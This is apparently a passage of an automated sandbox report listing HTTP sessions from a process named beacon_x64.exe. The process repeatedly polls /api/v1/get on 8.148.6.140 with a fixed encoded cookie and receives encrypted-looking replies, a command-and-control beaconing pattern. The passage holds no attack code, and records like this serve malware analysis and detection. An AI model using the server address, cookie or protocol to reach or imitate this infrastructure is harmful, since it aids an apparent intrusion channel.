          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache
          Jan 10, 2025 09:26:56.980648994 CET505INHTTP/1.1 200 OK
          Date: Fri, 10 Jan 2025 08:26:56 GMT
          Server: nginx
          Content-Length: 320
          Connection: keep-alive
          Content-Type: text/plain
          Cache-Control: no-cache
          Pragma: no-cache
          Data Raw: 78 52 33 30 46 70 41 66 2f 2b 58 76 64 72 7a 62 55 46 73 55 2b 53 36 50 71 67 77 38 59 72 65 31 70 6d 69 47 41 47 44 54 33 58 34 4e 6c 4b 6e 63 6f 58 6a 53 39 46 77 43 49 32 44 4f 33 4c 57 65 5a 48 30 56 37 2f 50 6d 68 4d 46 69 6d 5a 51 55 53 66 78 65 46 77 33 67 46 45 57 6d 51 47 6b 57 49 34 76 4c 64 30 79 58 6d 75 4a 6c 38 51 72 4e 38 71 47 78 61 62 46 7a 56 76 6e 4c 59 41 55 4f 39 77 6a 33 4b 62 78 44 69 44 55 57 4c 37 54 30 4c 69 4d 41 56 62 77 6f 30 53 76 72 75 56 6c 36 56 53 34 30 41 44 2f 69 78 71 79 6a 6e 59 50 32 5a 5a 4e 72 56 7a 6e 6a 32 67 6e 6d 62 61 32 4e 42 53 46 6b 41 4e 72 37 7a 78 36 47 53 49 32 38 67 31 42 79 78 79 41 45 43 4a 76 32 73 38 6a 2b 37 41 30 51 79 75 46 42 50 38 39 4e 34 64 39 49 59 76 2b 38 6d 62 35 63 58 6d 38 54 41 4e 50 67 6a 71 6e 41 32 34 4d 48 71 63 36 51 43 53 64 4b 66 78 4d 73 65 64 6e 6b 75 4c 74 50 69 48 72 38 62 4e 78 35 72 75 39 6d 70 31 6d 4f 67 78 77 39 56 41 2f 70 4d 30 56 58 56 2f 4f 7a 46 41 6c 6e
          Data Ascii: xR30FpAf/+XvdrzbUFsU+S6Pqgw8Yre1pmiGAGDT3X4NlKncoXjS9FwCI2DO3LWeZH0V7/PmhMFimZQUSfxeFw3gFEWmQGkWI4vLd0yXmuJl8QrN8qGxabFzVvnLYAUO9wj3KbxDiDUWL7T0LiMAVbwo0SvruVl6VS40AD/ixqyjnYP2ZZNrVznj2gnmba2NBSFkANr7zx6GSI28g1ByxyAECJv2s8j+7A0QyuFBP89N4d9IYv+8mb5cXm8TANPgjqnA24MHqc6QCSdKfxMsednkuLtPiHr8bNx5ru9mp1mOgxw9VA/pM0VXV/OzFAln


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          64192.168.2.6500518.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:26:57.099344015 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache
          Jan 10, 2025 09:26:58.651422024 CET505INHTTP/1.1 200 OK
          Date: Fri, 10 Jan 2025 08:26:58 GMT
          Server: nginx
          Content-Length: 320
          Connection: keep-alive
          Content-Type: text/plain
          Cache-Control: no-cache
          Pragma: no-cache
          Data Raw: 78 36 42 61 2b 79 4f 63 70 65 73 73 33 2f 34 66 65 30 6a 73 71 7a 67 6e 74 38 63 73 34 76 6c 6e 4b 30 77 59 4f 43 6d 36 45 6e 65 62 66 67 31 6d 72 38 49 50 65 74 53 4f 2b 2f 73 32 31 4a 65 58 31 4e 44 4e 76 64 41 70 52 5a 62 79 2f 4c 4d 64 4e 71 45 69 44 35 78 73 50 5a 6a 71 2f 56 49 62 4c 51 66 77 39 79 36 6a 76 36 66 35 4f 70 71 79 79 36 48 47 62 72 51 41 50 43 79 79 39 4b 70 6d 4e 4d 35 52 6a 51 73 46 51 42 45 67 30 6e 6b 6f 42 58 4f 62 4a 53 56 4a 58 64 54 7a 77 64 6d 43 64 32 4b 6d 2f 46 33 4c 75 51 61 64 70 45 58 67 79 6a 61 4b 77 41 4c 31 2b 76 61 4c 6a 41 77 53 66 58 69 51 67 41 73 76 42 7a 56 4f 72 51 71 61 55 69 69 4d 31 42 57 73 49 70 33 4e 4b 66 38 74 2b 58 46 67 38 53 69 71 5a 51 2f 33 38 4e 4e 54 66 45 4b 4d 53 49 44 67 61 49 2b 6c 6c 61 6d 69 2b 43 47 55 57 2b 49 34 68 72 76 57 79 51 50 46 55 6d 62 75 75 6b 52 37 62 34 64 5a 6c 4d 6b 43 4b 66 58 4b 73 54 66 65 6f 59 5a 65 50 41 2f 6b 55 34 48 2f 58 49 69 72 62 61 63 6d 30 4a 44 76
          Data Ascii: x6Ba+yOcpess3/4fe0jsqzgnt8cs4vlnK0wYOCm6Enebfg1mr8IPetSO+/s21JeX1NDNvdApRZby/LMdNqEiD5xsPZjq/VIbLQfw9y6jv6f5Opqyy6HGbrQAPCyy9KpmNM5RjQsFQBEg0nkoBXObJSVJXdTzwdmCd2Km/F3LuQadpEXgyjaKwAL1+vaLjAwSfXiQgAsvBzVOrQqaUiiM1BWsIp3NKf8t+XFg8SiqZQ/38NNTfEKMSIDgaI+llami+CGUW+I4hrvWyQPFUmbuukR7b4dZlMkCKfXKsTfeoYZePA/kU4H/XIirbacm0JDv


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          65192.168.2.6500528.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:26:58.768821955 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache
          Jan 10, 2025 09:26:59.749748945 CET293INHTTP/1.1 200 OK
          Date: Fri, 10 Jan 2025 08:26:59 GMT
          Server: nginx
          Content-Length: 108
          Connection: keep-alive
          Content-Type: text/plain
          Cache-Control: no-cache
          Pragma: no-cache
          Data Raw: 31 34 2b 79 57 68 54 34 2b 38 47 4d 53 53 6e 38 6b 31 61 45 57 49 72 2f 38 2b 37 70 30 70 6b 59 57 45 6a 6f 35 30 61 4d 64 6b 2b 4e 52 4e 4d 32 63 34 4f 48 52 63 37 35 33 4b 56 38 74 38 53 71 63 5a 31 51 44 36 54 56 4e 35 37 6d 77 7a 6d 50 43 74 54 37 68 56 38 74 77 6e 73 75 31 67 43 35 42 43 63 71 59 57 4c 43 78 79 77 3d
          Data Ascii: 14+yWhT4+8GMSSn8k1aEWIr/8+7p0pkYWEjo50aMdk+NRNM2c4OHRc753KV8t8SqcZ1QD6TVN57mwzmPCtT7hV8twnsu1gC5BCcqYWLCxyw=


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          66192.168.2.6500538.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:26:59.863451004 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache
          Jan 10, 2025 09:27:00.837529898 CET529INHTTP/1.1 200 OK
          Date: Fri, 10 Jan 2025 08:27:00 GMT
          Server: nginx
          Content-Length: 344
          Connection: keep-alive
          Content-Type: text/plain
          Cache-Control: no-cache
          Pragma: no-cache
          Data Raw: 4c 68 65 70 5a 31 6d 44 43 45 61 37 2b 37 56 51 56 7a 73 32 61 2f 74 41 65 33 57 67 73 56 6f 43 45 6f 64 65 41 44 79 52 37 77 55 78 34 32 4e 39 78 66 71 6e 6f 69 68 61 6d 6b 36 53 5a 47 5a 65 33 61 4b 69 7a 52 49 4b 65 5a 74 72 6c 72 31 6c 5a 65 4e 77 43 75 42 53 74 78 50 57 6c 73 63 4b 72 39 5a 6f 56 52 42 6f 43 6a 62 43 76 6f 4c 6d 72 50 36 59 6f 4f 52 6b 53 34 33 58 39 57 71 43 45 6e 7a 55 4f 74 4e 53 30 61 77 42 6b 37 74 33 51 53 69 73 5a 78 51 45 36 43 47 38 66 78 34 6c 49 72 56 52 48 30 52 4e 4e 73 47 46 6c 6d 42 75 42 43 43 59 65 41 37 37 61 76 69 6f 58 70 4b 32 64 6c 4a 36 6b 67 48 76 7a 51 57 68 70 6f 4d 66 45 50 49 48 4f 39 42 46 64 56 5a 32 50 42 54 48 50 52 59 6e 30 69 72 65 37 42 7a 6c 47 63 4d 71 6f 38 65 4a 38 59 73 50 73 4f 6d 4e 32 44 6e 51 35 75 58 63 39 79 5a 41 79 72 71 37 77 49 75 6b 72 30 65 39 57 43 55 4d 49 43 76 2f 76 34 6c 57 79 4b 55 66 6a 61 6f 6d 62 2b 48 59 66 44 45 68 76 4e 61 72 70 45 65 4a 47 70 69 70 57 53 5a 36 74 6c 44 70 71 48 2f 45 65 63 6e 41 6a 49 6b 5a 71 6b [TRUNCATED]
          Data Ascii: LhepZ1mDCEa7+7VQVzs2a/tAe3WgsVoCEodeADyR7wUx42N9xfqnoihamk6SZGZe3aKizRIKeZtrlr1lZeNwCuBStxPWlscKr9ZoVRBoCjbCvoLmrP6YoORkS43X9WqCEnzUOtNS0awBk7t3QSisZxQE6CG8fx4lIrVRH0RNNsGFlmBuBCCYeA77avioXpK2dlJ6kgHvzQWhpoMfEPIHO9BFdVZ2PBTHPRYn0ire7BzlGcMqo8eJ8YsPsOmN2DnQ5uXc9yZAyrq7wIukr0e9WCUMICv/v4lWyKUfjaomb+HYfDEhvNarpEeJGpipWSZ6tlDpqH/EecnAjIkZqkf+ew==


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          67192.168.2.6500548.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:27:00.959326982 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache
          Jan 10, 2025 09:27:01.918735027 CET357INHTTP/1.1 200 OK
          Date: Fri, 10 Jan 2025 08:27:01 GMT
          Server: nginx
          Content-Length: 172
          Connection: keep-alive
          Content-Type: text/plain
          Cache-Control: no-cache
          Pragma: no-cache
          Data Raw: 65 69 4f 50 6d 75 37 34 55 53 4f 63 54 42 41 4e 44 57 67 75 38 6b 73 68 4a 58 59 66 6f 43 46 43 2f 57 35 34 67 36 54 46 78 61 54 56 65 33 45 67 72 36 58 43 59 4f 6d 30 44 2b 34 58 65 52 63 49 66 52 56 7a 57 56 54 68 34 54 33 30 42 48 61 47 76 42 65 76 2b 52 43 38 43 53 32 46 48 74 79 31 33 32 71 49 71 77 37 75 59 61 52 69 4e 4f 7a 6d 50 7a 62 54 43 72 52 58 44 4b 50 6b 41 34 70 70 53 30 4e 58 57 39 38 53 54 64 57 6a 58 78 4b 49 53 66 4f 68 59 6b 43 61 34 69 63 4f 56 57 69 44 74 70 58 39 62 43 41 75 36 5a 4d 3d
          Data Ascii: eiOPmu74USOcTBANDWgu8kshJXYfoCFC/W54g6TFxaTVe3Egr6XCYOm0D+4XeRcIfRVzWVTh4T30BHaGvBev+RC8CS2FHty132qIqw7uYaRiNOzmPzbTCrRXDKPkA4ppS0NXW98STdWjXxKISfOhYkCa4icOVWiDtpX9bCAu6ZM=


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          68192.168.2.6500558.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:27:02.047360897 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache
          Jan 10, 2025 09:27:04.460125923 CET421INHTTP/1.1 200 OK
          Date: Fri, 10 Jan 2025 08:27:04 GMT
          Server: nginx
          Content-Length: 236
          Connection: keep-alive
          Content-Type: text/plain
          Cache-Control: no-cache
          Pragma: no-cache
          Data Raw: 46 77 73 75 68 71 6b 4f 71 32 31 52 30 70 4e 63 4f 71 38 4d 50 6e 57 6d 70 48 57 39 53 33 78 71 52 5a 63 63 30 68 69 77 4c 4c 45 33 75 78 76 42 76 39 70 66 4c 42 5a 69 36 6c 6b 6a 63 49 45 62 72 69 4a 77 32 54 63 71 42 2f 4a 66 59 32 76 57 59 56 61 51 72 76 6f 49 49 44 30 67 79 6b 64 68 6c 43 53 6e 57 64 38 45 78 68 4a 44 4b 41 5a 57 66 37 71 4c 31 46 57 78 77 54 37 57 5a 6f 53 76 4e 57 69 45 55 38 36 74 54 74 37 49 64 79 34 79 6b 7a 43 61 55 37 44 5a 4f 39 4e 6e 43 32 77 35 6e 55 72 72 72 41 5a 77 32 64 32 4e 57 65 52 6e 70 36 4e 66 46 72 56 4a 41 5a 6a 6e 33 65 65 4a 74 75 6e 66 6c 51 70 64 6d 2f 36 62 65 6b 4a 54 35 66 4a 73 31 31 32 6e 69 6f 2b 52 6a 45 41 32 37 70 79 50 69 59 35 52 76 78 38 3d
          Data Ascii: FwsuhqkOq21R0pNcOq8MPnWmpHW9S3xqRZcc0hiwLLE3uxvBv9pfLBZi6lkjcIEbriJw2TcqB/JfY2vWYVaQrvoIID0gykdhlCSnWd8ExhJDKAZWf7qL1FWxwT7WZoSvNWiEU86tTt7Idy4ykzCaU7DZO9NnC2w5nUrrrAZw2d2NWeRnp6NfFrVJAZjn3eeJtunflQpdm/6bekJT5fJs112nio+RjEA27pyPiY5Rvx8=


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          69192.168.2.6500568.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:27:04.622684956 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache
          Jan 10, 2025 09:27:05.605257034 CET185INHTTP/1.1 200 OK
          Date: Fri, 10 Jan 2025 08:27:05 GMT
          Server: nginx
          Content-Length: 108
          Connection: keep-alive
          Content-Type: text/plain
          Cache-Control: no-cache
          Pragma: no-cache
          Jan 10, 2025 09:27:05.605334044 CET108INData Raw: 66 52 54 34 6e 65 6c 5a 38 47 53 48 69 36 38 4d 53 34 45 54 73 77 4c 61 55 52 43 78 35 4e 46 56 51 74 6d 7a 72 75 4d 4b 62 44 5a 6c 78 63 4b 56 6e 37 6c 39 34 49 6d 56 52 65 64 4d 44 5a 34 6d 69 70 47 54 79 63 70 75 70 50 4c 76 45 69 44 71 49 4d
          Data Ascii: fRT4nelZ8GSHi68MS4ETswLaURCx5NFVQtmzruMKbDZlxcKVn7l94ImVRedMDZ4mipGTycpupPLvEiDqIMpxwwWzZK7gW6i1ve/y9Xhzi5s=


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          70192.168.2.6500578.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:27:05.718764067 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          71192.168.2.6500598.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:27:06.688679934 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          72192.168.2.6500608.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:27:10.843080044 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache
          Jan 10, 2025 09:27:12.438888073 CET184INHTTP/1.1 200 OK
          Date: Fri, 10 Jan 2025 08:27:12 GMT
          Server: nginx
          Content-Length: 64
          Connection: keep-alive
          Content-Type: text/plain
          Cache-Control: no-cache
          Pragma: no-cache
          Jan 10, 2025 09:27:12.439081907 CET64INData Raw: 73 38 58 74 31 49 39 2f 6a 35 51 53 36 65 39 79 37 34 4e 4e 33 61 77 41 51 6a 39 47 61 57 73 36 30 73 73 5a 34 36 67 45 31 67 51 7a 5a 75 54 58 61 37 30 67 39 68 2f 49 48 65 36 73 4d 6c 33 34
          Data Ascii: s8Xt1I9/j5QS6e9y74NN3awAQj9GaWs60ssZ46gE1gQzZuTXa70g9h/IHe6sMl34


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          73192.168.2.6500618.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:27:12.562727928 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache
          Jan 10, 2025 09:27:13.507354021 CET465INHTTP/1.1 200 OK
          Date: Fri, 10 Jan 2025 08:27:13 GMT
          Server: nginx
          Content-Length: 280
          Connection: keep-alive
          Content-Type: text/plain
          Cache-Control: no-cache
          Pragma: no-cache
          Data Raw: 57 62 62 53 41 51 46 45 46 65 6e 4a 64 32 53 57 7a 75 52 4c 4f 37 37 49 41 30 6b 63 4c 32 39 58 2f 6c 4a 73 6e 75 36 47 44 32 43 61 73 37 53 4e 42 2b 41 31 37 66 30 69 51 5a 6d 73 57 69 69 51 5a 58 38 55 2b 76 56 32 61 43 36 6f 4a 6c 2f 54 63 63 6e 36 49 64 39 34 44 48 66 76 54 66 5a 48 68 38 58 52 41 39 31 36 63 54 64 4d 36 38 39 68 77 59 76 77 50 74 36 31 7a 4f 52 73 4a 71 37 51 69 43 53 2b 71 73 57 73 68 4c 46 73 75 50 48 34 4c 33 36 76 72 6f 63 68 62 79 42 50 67 6a 6a 68 6f 76 4d 56 2b 59 76 6e 67 71 71 2b 31 79 4c 2f 5a 7a 69 57 6f 4a 71 64 72 62 61 48 35 62 42 41 39 4f 37 4b 58 52 41 54 50 4b 74 4d 6f 52 4f 4b 6d 42 4e 4f 63 71 38 68 59 6b 4b 73 6c 76 37 36 67 63 78 66 4a 57 59 54 4a 35 76 2f 2b 72 6d 58 31 49 38 45 67 69 35 73 54 38 5a 35 73 33 32 43 54 79 4f 74 74 67 53 70 41 46 36 66 63 48 41 45 69 44 48 42 42 67 3d 3d
          Data Ascii: WbbSAQFEFenJd2SWzuRLO77IA0kcL29X/lJsnu6GD2Cas7SNB+A17f0iQZmsWiiQZX8U+vV2aC6oJl/Tccn6Id94DHfvTfZHh8XRA916cTdM689hwYvwPt61zORsJq7QiCS+qsWshLFsuPH4L36vrochbyBPgjjhovMV+Yvngqq+1yL/ZziWoJqdrbaH5bBA9O7KXRATPKtMoROKmBNOcq8hYkKslv76gcxfJWYTJ5v/+rmX1I8Egi5sT8Z5s32CTyOttgSpAF6fcHAEiDHBBg==


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          74192.168.2.6500628.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:27:13.624799967 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          75192.168.2.6500638.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:27:14.594922066 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          76192.168.2.6500648.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:27:18.721239090 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          77192.168.2.6500658.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:27:19.704741955 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache
          Jan 10, 2025 09:27:20.699805975 CET293INHTTP/1.1 200 OK
          Date: Fri, 10 Jan 2025 08:27:20 GMT
          Server: nginx
          Content-Length: 108
          Connection: keep-alive
          Content-Type: text/plain
          Cache-Control: no-cache
          Pragma: no-cache
